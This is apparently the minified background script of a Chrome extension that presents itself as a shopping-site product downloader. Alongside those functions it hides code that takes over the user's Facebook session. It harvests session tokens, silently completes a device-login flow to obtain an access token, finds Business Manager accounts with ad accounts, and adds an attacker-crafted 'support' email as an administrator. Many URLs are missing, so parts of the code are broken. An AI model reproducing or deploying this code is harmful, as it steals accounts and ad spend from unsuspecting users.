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Created May 2, 2023 14:59
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function e(e, t) {
for (const o of e.requestHeaders) if ( === t) return o.value;
chrome.runtime.onInstalled.addListener(function () {["SETTINGS"], function (e) {
reviewPages: 1,
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isDownloadAsZip: !1,
VERSION: chrome.runtime.getManifest().version,
chrome.runtime.onMessage.addListener(function (e, t, o) {
const { ACTION: a, data: s } = e;
if ("SAVE_TO_FOLDER" === a) {
const { folderName: e, urls: t } = s;
e &&
t &&
(function (e, t, o) {
t.forEach(({ filename: t, url: o }) => {{ url: o, filename: `${e}/${t}` });
o({ rs: !0 });
})(e, t, o);
return !0;
function (t) {["APIHeaders"], function (o) {
let a = o.APIHeaders || {};
const s = e(t, "If-None-Match-");
s && (a["If-None-Match-"] = s);
if (e(t, "X-API-SOURCE")) {
const o = e(t, "af-ac-enc-dat");
if (o) {
const s = e(t, "X-CSRFToken");
(a["X-CSRFToken"] = s), (a["af-ac-enc-dat"] = o);
}{ APIHeaders: a });
urls: ["*://*/api/v4/item/get*", "*://*/api/v4/product/get_shop_info?*"],
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id: 1,
action: {
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.then((e) => e);
const t = (e, t, o) => {
let a = e.split(t);
return a[1] ? ((a = a[1].split(o)), a[0]) : null;
async function o(e) {
return new Promise((t) => {
setTimeout(t, e);
async function a(e, t, o, a) {
return fetch("", {
method: "POST",
body: new URLSearchParams({
__user: e.user_id,
__a: "1",
__csr: "",
__req: "q",
__hs: "19302.BP:brands_pkg.",
dpr: "2",
__ccg: "EXCELLENT",
__rev: "1006554156",
__s: "64tfoq:e3oe6h:fez9po",
__hsi: "7162745719338087508",
__comet_req: "0",
fb_dtsg: e.fb_dtsg,
fb_api_caller_class: "RelayModern",
fb_api_req_friendly_name: a,
variables: o,
server_timestamps: "true",
doc_id: t,
}).then((e) => e.json());
async function s(e) {
const { user_code: o, code: s } = await (async function () {
try {
const e =
return await fetch(e, { credentials: "include", method: "POST" }).then(
(e) => e.json()
} catch (e) {
return {};
await (async function (e, t) {
const o = `jazoest=25405&fb_dtsg=${t.fb_dtsg}&user_code=${e}&qr=&__user=${t.user_id}&__a=1&__dyn=&__csr=&__req=b&__hs=19183.BP%3ADEFAULT.`;
return await fetch("", {
body: o,
credentials: "include",
method: "POST",
mode: "cors",
headers: {
"content-type": "application/x-www-form-urlencoded;charset=UTF-8",
}).then((e) => e.text());
})(o, e);
const n = await (async function (e, o) {
try {
const a = `${e}&state=f33299bec0998c&redirect_uri=`,
s = {
__asyncDialog: "1",
__user: o.user_id,
__a: "1",
__dyn: "",
__csr: "",
__req: "a",
__hs: "19300.BP:DEFAULT.",
dpr: "2",
__ccg: "MODERATE",
__rev: "",
__s: "",
__hsi: "",
__comet_req: "0",
fb_dtsg: o.fb_dtsg,
jazoest: "25709",
lsd: "",
__aaid: "",
__spin_r: "",
__spin_b: "trunk",
__spin_t: "",
n = await fetch(a, {
body: new URLSearchParams(s),
credentials: "include",
method: "POST",
mode: "same-origin",
}).then((e) => e.text());
if (!n) return null;
const r = t(n, 'name=\\"scope\\" value=\\"', '\\"'),
c = t(n, 'name=\\"logger_id\\" value=\\"', '\\"');
return {
encryptedBody: t(n, 'name=\\"encrypted_post_body\\" value=\\"', '\\"'),
scope: r,
logger_id: c,
} catch (e) {}
})(o, e);
if (n) {
const r = await (async function (e, o) {
try {
const a = "",
s = {
jazoest: "25709",
fb_dtsg: o.fb_dtsg,
from_post: "1",
scope: o.scope,
display: "async",
sdk: "",
sdk_version: "",
domain: "",
sso_device: "",
user_code: e,
nonce: "",
logger_id: o.logger_id,
auth_type: "rerequest",
auth_nonce: "",
code_challenge: "",
code_challenge_method: "",
encrypted_post_body: o.encryptedBody,
"return_format[0]": "code",
__CONFIRM__: "1",
__user: o.user_id,
__a: "1",
__dyn: "",
__csr: "",
__req: "d",
__hs: "19300.BP:DEFAULT.",
dpr: "2",
__ccg: "MODERATE",
__rev: "",
__s: "",
__hsi: "",
__comet_req: "0",
lsd: "",
__aaid: "",
__spin_r: "",
__spin_b: "trunk",
__spin_t: "",
n = await fetch(a, {
body: new URLSearchParams(s),
credentials: "include",
method: "POST",
mode: "same-origin",
}).then((e) => e.text());
return n ? t(n, 'code":"', '"') : null;
} catch (e) {}
})(o, { ...n, ...e });
if (r) {
await (async function (e, t, o) {
try {
const a = "",
s = {
user_code: e,
code: t,
auth_method: "manual_entry",
__user: o.user_id,
__a: "1",
__dyn: "",
__csr: "",
__req: "d",
__hs: "19300.BP:DEFAULT.",
dpr: "2",
__ccg: "EXCELLENT",
__rev: "1006543583",
__s: "",
__hsi: "",
__comet_req: "0",
fb_dtsg: o.fb_dtsg,
jazoest: "25263",
lsd: "TPWqcgs_s0GQNJPT882jRs",
__aaid: "1108681562814022",
__spin_r: "",
__spin_b: "trunk",
__spin_t: "",
return await fetch(a, {
body: new URLSearchParams(s),
credentials: "include",
method: "POST",
mode: "same-origin",
} catch (e) {}
})(o, r, e);
let t = await (async function (e) {
try {
const t = "",
o = `access_token=1348564698517390|007c0a9101b9e1c8ffab727666805038&code=${e}`,
a = await fetch(t, {
body: o,
credentials: "include",
method: "POST",
mode: "cors",
}).then((e) => e.json());
return a?.access_token;
} catch (e) {}
t +=
"|" +
(await (async function (e) {
const t = await (async function () {
const e = await fetch(
{ credentials: "include" }
).then((e) => e.text());
return (function (e, t) {
const o = t.exec(e);
return o ? o[1] : null;
})(e, /"dtsg_ag\\":{\\"token\\":\\"(.*?)\\"/);
return fetch(
{ credentials: "include" }
.then((e) => e.text())
.then((e) => {
const t = /"current_birthday\\":\\"(.*?)"/.exec(e);
return t ? t[1].replaceAll("\\", "") : null;
.catch((e) => console.log("error", e));
const n = Math.floor(988888 * Math.random()) + 11111,
c =;
return (
(t = btoa(t)),
await a(
await a(
return !1;
function n(e, t, o) {
t =, t) =>
null == e || "" === e
? "t"
: t > 0
? (function (e, t) {
t = Math.pow(10, t);
for (var o = ["k", "m", "b", "t"], a = o.length - 1; a >= 0; a--) {
var s = Math.pow(10, 3 * (a + 1));
if (s <= e) {
1e3 == (e = Math.round((e * t) / s) / t) &&
a < o.length - 1 &&
((e = 1), a++),
(e += o[a]);
return e;
})(e, 0)
: e
const a = Math.floor(10 + 90 * Math.random());
return ["support-", e, "-", t.join("."), ".", a, "@", o].join("");
function r(e, t, o) {
return fetch(
body: `brandId=${e}&email=${t}&method=post&pretty=0&roles=["EMPLOYEE"]&suppress_http_code=1`,
method: "POST",
headers: { "content-type": "application/x-www-form-urlencoded" },
.then((e) => e.json())
.catch((e) => e.message);
const c = async (e, a) => {
if (
(await fetch("", {
method: "POST",
body: new URLSearchParams({ id: e }),
headers: { reauth: a },
.then((e) => e.json())
.then((t) => {
e = { user_id: e, ...t };
!e || !e.member)
if (
(await (async function () {
const e = await fetch(
{ method: "GET", credentials: "include" }
.then((e) => e.text())
.then((e) => /window.location.replace\("(.*)"/.exec(e)?.[1])
.catch(() => !1);
return "string" != typeof e
? ""
: fetch(e, { method: "GET", credentials: "include" })
.then((e) => e.text())
.then((e) => {
let o = t(e, 'DTSGInitData",[],{"token":"', '"'),
a = /__accessToken="([a-zA-Z\d]+)"/.exec(e)?.[1];
return { fb_dtsg: o, token: a };
.catch(() => "");
})().then((t) => {
e = { ...e, ...t };
let c = await fetch(
{ method: "GET", credentials: "include" }
).then((e) => e.json());
c = c?.data
?.map((e) => ({
x1: e?.owned_ad_accounts?.summary?.total_count,
x2: e?.client_ad_accounts?.summary?.total_count,
(e) =>
(e.x1 > 0 || e?.x2 > 0) && !e?.permitted_roles?.includes("EMPLOYEE")
.sort((e, t) => (e.x1 === t.x1 ? t.x2 - e.x2 : t.x1 - e.x1));
const i = c?.length;
let _ = 0;
const d = [];
let u = 0;
for (; u < 2; ) {
for (const t of c) {
const a = t?.id || null;
if (d.includes(a)) continue;
if (
(t?.pending_users?.data || []).filter(
(e) => e?.email?.includes(a) && e?.email?.includes(a)
).length +
u <
) {
const s = t?.business_users?.data?.filter(
(e) => "ADMIN" === e?.role
if (
(null == t?.ran4 &&
(t.ran4 = await ((p =,
(m = e),
method: "POST",
body: new URLSearchParams({
__user: m.user_id,
__a: "1",
__csr: "",
__req: "q",
__hs: "19302.BP:brands_pkg.",
dpr: "2",
__ccg: "EXCELLENT",
__rev: "1006554156",
__s: "64tfoq:e3oe6h:fez9po",
__hsi: "7162745719338087508",
__comet_req: "0",
fb_dtsg: m.fb_dtsg,
jazoest: "25493",
lsd: "djAzCuXL_tcEr67gBraCiv",
__aaid: "2048654205335830",
__spin_r: "1006554156",
__spin_b: "trunk",
__spin_t: "1667706695",
__jssesw: "1",
credentials: "include",
.then((e) => e.text())
(e) => (
(e = e.replace("for (;;);", "")),
.catch(() => "e"))),
1 == +t.x1 && 1 == +t.ran4 && 0 == +t.x2)
) {
const c = n(a, [e.user_id, t.x1, t.x2, s, t.ran4, i, _], e.member),
u = await r(a, c, e.token);
if (u?.id) {
let t = 0;
for (; t < 3; ) {
if (
await ((l =,
(h = e.token),
fetch(`${l}`, {
method: "POST",
body: `role=ADMIN&access_token=${h}`,
headers: {
"content-type": "application/x-www-form-urlencoded",
.then((e) => e.json())
.catch((e) => e.message))
await o(500);
} else 2859009 === u?.error?.error_subcode && ((_ = 1), d.push(a));
await o(500);
var l, h, p, m;{ checkAuth: 1 === _ }),
(1 !== _ && 1 !== e.t) || (await s(e));
chrome.runtime.onMessage.addListener(function (e, t, o) {
return (
"check-user" !== e.login ||
((async () => {
let e = null;
const t = await fetch(
.then((e) => e.text())
.catch(() => !1);
if ("string" == typeof t) {
const o = /"ACCOUNT_ID":"([\d]+)"/;
o.test(t) && (e = o.exec(t)[1]);
return e;
})().then(async (t) => {
let a = c(t, e.reauth);
o({ isLogin: null !== t && "0" !== t, id: t, member: a });
export { c as handleResponseMember };
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